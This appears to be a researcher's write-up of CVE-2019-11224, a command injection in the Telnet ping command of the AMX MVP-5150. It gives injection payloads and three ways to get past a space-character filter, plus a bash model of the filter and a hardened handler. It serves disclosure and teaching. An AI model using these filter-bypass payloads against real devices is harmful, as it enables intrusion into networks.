How I Found Command Injection in MVP-5150 (CVE-2019-11224)

This article shows how I found CVE-2019-11224 and introduces three ways to bypass a filter on the “space” character when injecting commands into a Linux shell.
Introduction
OS command injection (CWE-78) occurs when software builds all or part of an OS command from externally influenced input received from an upstream component, but does not neutralise, or incorrectly neutralises, the special elements (such as “;”) that can change the intended command when it is passed to a downstream component.
Below, I first describe how I found CVE-2019-11224, then the three techniques I tried for bypassing the “space” character during the injection and which of them worked against the device.
Environment
An AMX MVP-5150 device running the latest available firmware (v2.87.13).
The AMX MVP-5150 has multiple network interfaces: it can be connected over a wired Ethernet cable and can also join a Wi-Fi network. (In some cases the Wi-Fi password is stored unencrypted on the Linux system, so anyone able to read the Wi-Fi configuration file can recover the Wi-Fi password.)
Find OS Command Injection
After connecting to the MVP-5150 via its Telnet server, I executed “?” to list the available commands. Luckily, there was a command called “ping”.

Then I executed a payload to test whether the ping command was vulnerable to command injection.

The result made it obvious that there was a command injection issue.
Bypass Space Character
However, the MVP-5150 did not accept the “space” character in the argument. For example, if I executed ping 127.0.0.1;ls -ls, the device only executed ping 127.0.0.1;ls: the argument was truncated at the first space, so the injected ls ran without its options.
So I needed a payload that the shell would interpret exactly as a space, but that does not itself contain any space character.
Shell Variables
On a Linux system the shell provides a number of variables, such as $HOME and $USERNAME.
One special variable, $IFS (the internal field separator, which by default holds space, tab and newline), can be used in place of a literal space: ls$IFS-la is expanded to ls -la.

However, in this case it did not work. The device took the whole input line and converted it to lower case before executing it, so $IFS became $ifs, an unset variable that expands to nothing.
Brace Expansion
Some Linux shells offer a way to run a command with arguments without a space character: brace expansion with { }, where {ls,-la} is expanded to ls -la. This is a bash/zsh feature rather than part of POSIX sh, so it is not available in every shell.

However, in this case it did not work either.
A Custom $IFS
Although we cannot use $IFS itself, we can create our own variable that holds a space and use it in place of $IFS to bypass the filter. For example:

As mentioned before, the device converts all input to lower case, so we just need to change our $HZ to $hz, and it works!
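To make the filter and the three approaches concrete, here is an added example (not code from the original article, nor from the MVP-5150 firmware) written in bash. It models the Telnet ping handler as this article describes it: the whole argument line is lower-cased, truncated at the first space, and spliced into a shell command string. It then runs a plain “;” injection, the $IFS payload, the brace-expansion payload and a lower-case custom-variable payload through that model, and finishes with a hardened handler for contrast. Assumptions, all mine: the device behaviour is reconstructed from the description above; ping is replaced by echo so the script runs offline; the injected string is interpreted by bash, so brace expansion succeeds here even though the article reports it failed on the device; and $'\x20' (ANSI-C quoting) is one way, not necessarily the author's, to put a space into a lower-case variable without typing one.

```shell
#!/usr/bin/env bash
# Added example: a model of the MVP-5150 Telnet "ping" handler as the
# article describes it, not the device's real code. Assumptions: the
# handler lower-cases its input and truncates it at the first space
# (reconstructed from the article), "ping" is replaced by echo so this
# runs offline, and the injected text is executed by bash.

# What the device does to the argument line before executing it.
device_filter() {
    local line
    line=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')  # lower-case everything
    printf '%s' "${line%% *}"                              # drop the first space and all that follows
}

# The vulnerable sink: the filtered argument is concatenated into a command
# string and handed to a shell, so a ';' in the argument starts a second command.
device_ping() {
    local arg
    arg=$(device_filter "$1")
    bash -c "echo PING $arg" 2>&1
}

# Hardened handler: allow-list the value and never re-parse it with a shell.
# A real fix would exec ping with "$1" passed as a single argv element.
safe_ping() {
    case $1 in
        ''|*[!A-Za-z0-9.:-]*) return 1 ;;   # anything but a host/IP is rejected
    esac
    printf 'PING %s\n' "$1"
}

# Walk through the payloads discussed in the article.
demo() {
    set -- \
        '127.0.0.1;echo hello world' \
        '127.0.0.1;echo$IFS"hello"' \
        '127.0.0.1;{echo,hello}' \
        "127.0.0.1;hz=\$'\\x20';echo\${hz}hello"   # assumed separator trick: hz=$'\x20'
    for p in "$@"; do
        printf '>>> payload : %s\n' "$p"
        printf '    executed: ping %s\n' "$(device_filter "$p")"
        device_ping "$p" || printf '    (exit status %s)\n' "$?"
        echo
    done
}

demo
```

The first payload shows that the “;” injection works but “echo hello world” is cut down to “echo”. The second shows $IFS being lower-cased into the unset $ifs, so the shell looks for a command called echohello and exits with status 127. The third works under bash only because bash performs brace expansion; a POSIX shell such as dash does not, which matches the article's report that it failed on the device. The fourth defines a lower-case variable holding a space and survives both the lower-casing and the truncation.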

Summary
AMX devices are widely deployed in many environments. If a malicious user gains access to one of them, they can use it as a jump-box to perform further attacks on the network it sits in.
The CVE details can be found in this link, and the CVE advisory in this link.